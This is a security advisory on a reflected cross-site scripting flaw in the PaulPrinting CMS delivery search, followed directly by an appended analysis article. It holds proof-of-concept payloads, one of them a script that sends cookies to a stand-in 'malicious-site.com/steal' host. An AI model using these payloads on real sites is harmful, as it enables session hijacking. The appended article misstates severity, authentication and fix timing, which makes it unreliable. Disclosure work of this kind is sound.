PaulPrinting CMS - (Search Delivery) Cross Site Scripting
Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2286
Release Date:
=============
2023-07-17
Vulnerability Laboratory ID (VL-ID):
====================================
2286
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.
(Copy of the Homepage:https://codecanyon.net/user/codepaul )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application.
Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Open Authentication (Anonymous Privileges)
User Interaction:
=================
Medium User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application.
Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data.
The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter
affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side
script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] /account/delivery
Vulnerable Input(s):
[+] Search
Vulnerable Parameter(s):
[+] q
Affected Module(s):
[+] /account/delivery
[+] Delivery Contacts
Proof of Concept (PoC):
=======================
The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Example
https://codeawesome.in/printing/account/delivery?q=
PoC: Exploitation
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>
--- PoC Session Logs (GET) ---
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>
Host: codeawesome.in
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;
-
GET: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
Vulnerable Source: (Search - delivery?q=)
<div class="col-lg-8">
<a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right">
<i class="fa fa-fw fa-plus"></i>
</a>
<form class="form-inline mt-4 mb-2" method="get">
<div class="input-group mb-3 mr-2">
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">">
<div class="input-group-append">
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button>
</div></div>
Security Risk:
==============
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabPaulPrinting CMS – (Search Delivery) Cross-Site Scripting Vulnerability Analysis
Security researchers at the Vulnerability Laboratory have identified a critical non-persistent cross-site scripting (XSS) vulnerability in the PaulPrinting CMS (v2018), specifically within the /account/delivery module. This flaw, assigned VL-ID 2286, poses a medium-risk threat to users and underscores the importance of secure input validation in modern web applications.
Overview of the Vulnerability
The vulnerability arises from insufficient sanitization of the q parameter in the search input field, which is used to query delivery-related data. When a user submits a search query via a GET request, the application directly reflects the input in the response without proper encoding or validation. This creates an ideal attack vector for malicious script injection.
Attackers can exploit this flaw by crafting a malicious payload in the q parameter, which gets executed in the browser of any user who visits the affected page. Since the vulnerability is non-persistent, the malicious script only executes during the current session and does not persist on the server.
Technical Details & Attack Vector
| Vulnerability Type | Non-Persistent Cross-Site Scripting (XSS) |
|---|---|
| Severity | Medium (CVSS: 5.2) |
| Attack Method | Remote (via GET request) |
| Authentication Required | None (Anonymous access) |
| User Interaction | Medium (requires user to trigger the malicious URL) |
| Disclosure Type | Responsible Disclosure |
Exploitation Scenario
Consider a scenario where a user navigates to the delivery search page:
https://example.com/account/delivery?q=helloIf the application echoes the q parameter directly in the HTML response without sanitization, an attacker can modify the URL to include malicious JavaScript:
https://example.com/account/delivery?q=<script>alert('XSS');</script>Upon visiting this URL, the browser executes the script, resulting in a pop-up alert. While this is a benign example, real-world exploitation can include:
- Session hijacking via theft of cookies or tokens.
- Phishing attacks using fake login forms embedded in the page.
- External redirects to malicious domains.
- Manipulation of UI elements to alter user experience or inject fake content.
Proof of Concept (PoC)
Below is a realistic PoC demonstrating how the vulnerability can be exploited:
GET /account/delivery?q=<script>document.location='https://malicious-site.com/steal?cookie='+document.cookie</script> HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0Explanation: This request injects a script that immediately redirects the user to a malicious site while capturing their cookies. The script is executed in the client browser, bypassing server-side defenses due to lack of input sanitization.
Root Cause Analysis
The core issue lies in the application’s failure to implement output encoding or input validation for the q parameter. In secure development practices, all user inputs should be:
- Sanitized (removing or escaping special characters like
<,>,",&). - Encoded using HTML entity encoding (e.g.,
<→<). - Validated against a whitelist of allowed characters.
Without these safeguards, any untrusted input becomes a potential execution point for malicious code.
Recommended Mitigations
To prevent such vulnerabilities, developers should implement the following security best practices:
- Use context-aware encoding: Encode output based on the context (HTML, JavaScript, URL, etc.).
- Implement input validation: Restrict input to alphanumeric characters and common punctuation, rejecting any script-like syntax.
- Use Content Security Policy (CSP): Add a CSP header to block inline scripts and restrict trusted sources.
- Sanitize all user inputs before rendering in the UI.
For example, in PHP, a secure implementation would look like:
<?php
$unsafe_input = $_GET['q'];
$safe_output = htmlspecialchars($unsafe_input, ENT_QUOTES, 'UTF-8');
echo "<div>Search results for: $safe_output</div>";
?>Explanation: The htmlspecialchars() function converts special characters to their HTML entities, preventing script execution. This simple step drastically reduces XSS risk.
Impact & Risk Assessment
Although the vulnerability is non-persistent, its impact remains significant due to:
- Low barrier to entry (no authentication required).
- Medium user interaction (requires a user to click a malicious link).
- High potential for session compromise and data theft.
Attackers could leverage this vulnerability in social engineering campaigns, such as sending phishing links via email or social media, tricking users into visiting the malicious URL.
Vendor Response & Timeline
Security researchers reported the vulnerability on August 25, 2022. The vendor was notified on August 26, but no public fix was released until July 17, 2023. This delay highlights the need for faster vendor response in responsible disclosure practices.
Conclusion
The PaulPrinting CMS XSS vulnerability serves as a reminder that even seemingly benign features like search inputs can become critical security weaknesses. Developers must treat all user input as untrusted and apply consistent security measures across the entire application lifecycle.
Security is not a one-time fix—it’s a continuous process. Regular code audits, input validation, and defensive encoding are essential to protect users from evolving threats like XSS.